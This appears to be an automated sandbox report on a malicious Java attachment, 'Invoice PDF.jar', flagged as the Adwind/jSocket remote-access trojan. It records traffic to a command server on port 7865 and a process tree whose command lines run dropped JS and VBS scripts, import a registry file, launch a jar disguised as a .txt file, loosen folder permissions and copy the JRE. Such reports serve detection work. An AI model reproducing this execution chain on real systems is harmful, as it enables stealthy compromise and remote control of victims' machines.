                                                                                                                                                                                              04/19/21-23:32:52.496777ICMP449ICMP Time-To-Live Exceeded in Transit152.195.101.202192.168.2.6
                                                                                                                                                                                              04/19/21-23:32:52.497122ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                                                                                                              04/19/21-23:32:52.547701ICMP449ICMP Time-To-Live Exceeded in Transit152.195.101.129192.168.2.6
                                                                                                                                                                                              04/19/21-23:32:52.548930ICMP384ICMP PING192.168.2.693.184.221.240
                                                                                                                                                                                              04/19/21-23:32:52.589492ICMP408ICMP Echo Reply93.184.221.240192.168.2.6
                                                                                                                                                                                              04/19/21-23:33:40.478077TCP2020728ET TROJAN Possible Adwind/jSocket SSL Cert (assylias.Inc)786549739107.175.101.209192.168.2.6

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Apr 19, 2021 23:33:39.848345995 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:39.985748053 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:39.985866070 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.336231947 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.478046894 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:40.478076935 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:40.478193045 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.510803938 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:40.510826111 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:40.512994051 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.548417091 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.568782091 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.573935986 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.705883026 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:40.713538885 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:40.713563919 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:40.713646889 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.716669083 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.855267048 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:40.860838890 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.861615896 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.862241983 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.862607956 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.862957954 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.863249063 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.863450050 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:40.996846914 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:40.998723984 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:46.919878960 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:46.919935942 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:46.920037985 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:33:46.920137882 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:47.069657087 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:47.274620056 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:47.285845995 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:33:47.422147989 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:02.321569920 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:02.581135035 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:07.322629929 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:07.579730034 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.387789965 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.398546934 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.431570053 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.536151886 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.536434889 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.543152094 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.748888969 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.748910904 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.748919964 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.749139071 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.753973007 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.754911900 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.755259991 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.892981052 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.894902945 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.895742893 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:17.093564034 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:17.292509079 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:17.593197107 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938101053 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938141108 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938162088 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938210011 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938298941 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938339949 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938513994 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938539028 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938555956 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938579082 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938596964 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938612938 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938622952 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938648939 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938658953 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938678026 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938689947 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938709974 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938721895 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938736916 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938749075 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938766956 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938786030 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938802958 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938838005 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938878059 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938894987 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.939007044 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.939049006 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.939065933 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.939112902 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074119091 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074167967 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074203968 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074235916 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074343920 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074388981 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074914932 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074953079 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074981928 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.075012922 CEST786549774107.175.101.209192.168.2.6

                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                              Statistics

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              Analysis Process: cmd.exe PID: 6840 Parent PID: 4492

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:51
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'' >> C:\cmdlinestart.log 2>&1
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 6848 Parent PID: 6840

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:51
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Analysis Process: java.exe PID: 6892 Parent PID: 6840

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:52
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'
                                                                                                                                                                                              Imagebase:0xe60000
                                                                                                                                                                                              File size:192376 bytes
                                                                                                                                                                                              MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:Java
                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                              Analysis Process: icacls.exe PID: 6968 Parent PID: 6892

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:54
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
                                                                                                                                                                                              Imagebase:0x11f0000
                                                                                                                                                                                              File size:29696 bytes
                                                                                                                                                                                              MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 6984 Parent PID: 6968

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:54
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Analysis Process: wscript.exe PID: 6992 Parent PID: 6892

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:54
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:wscript C:\Users\user\bgddtomvyl.js
                                                                                                                                                                                              Imagebase:0xa40000
                                                                                                                                                                                              File size:147456 bytes
                                                                                                                                                                                              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Analysis Process: regedit.exe PID: 7120 Parent PID: 6992

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:59
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg'
                                                                                                                                                                                              Imagebase:0xde0000
                                                                                                                                                                                              File size:316416 bytes
                                                                                                                                                                                              MD5 hash:617538C965AC4DDC72F9CF647C4343D5
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                              Analysis Process: javaw.exe PID: 1540 Parent PID: 6992

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:13
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt'
                                                                                                                                                                                              Imagebase:0xd40000
                                                                                                                                                                                              File size:192376 bytes
                                                                                                                                                                                              MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                              Analysis Process: java.exe PID: 4596 Parent PID: 1540

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:14
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class
                                                                                                                                                                                              Imagebase:0xe60000
                                                                                                                                                                                              File size:192376 bytes
                                                                                                                                                                                              MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 4512 Parent PID: 4596

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:14
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Analysis Process: cmd.exe PID: 6132 Parent PID: 1540

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:16
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 5688 Parent PID: 6132

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:17
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: cscript.exe PID: 4248 Parent PID: 6132

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:17
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
                                                                                                                                                                                              Imagebase:0x150000
                                                                                                                                                                                              File size:143360 bytes
                                                                                                                                                                                              MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: cmd.exe PID: 6236 Parent PID: 4596

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:17
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 6320 Parent PID: 6236

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:18
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: cscript.exe PID: 6500 Parent PID: 6236

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:18
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
                                                                                                                                                                                              Imagebase:0x150000
                                                                                                                                                                                              File size:143360 bytes
                                                                                                                                                                                              MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: cmd.exe PID: 724 Parent PID: 1540

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:19
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 6716 Parent PID: 724

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:19
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: cscript.exe PID: 6776 Parent PID: 724

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:20
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
                                                                                                                                                                                              Imagebase:0x150000
                                                                                                                                                                                              File size:143360 bytes
                                                                                                                                                                                              MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: cmd.exe PID: 6912 Parent PID: 4596

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:21
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 6688 Parent PID: 6912

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:21
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: cscript.exe PID: 6980 Parent PID: 6912

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:22
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
                                                                                                                                                                                              Imagebase:0x150000
                                                                                                                                                                                              File size:143360 bytes
                                                                                                                                                                                              MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: xcopy.exe PID: 6848 Parent PID: 1540

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:22
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e
                                                                                                                                                                                              Imagebase:0x140000
                                                                                                                                                                                              File size:44544 bytes
                                                                                                                                                                                              MD5 hash:9F3712DDC0D7FE3D75B8A06C6EE8E68C
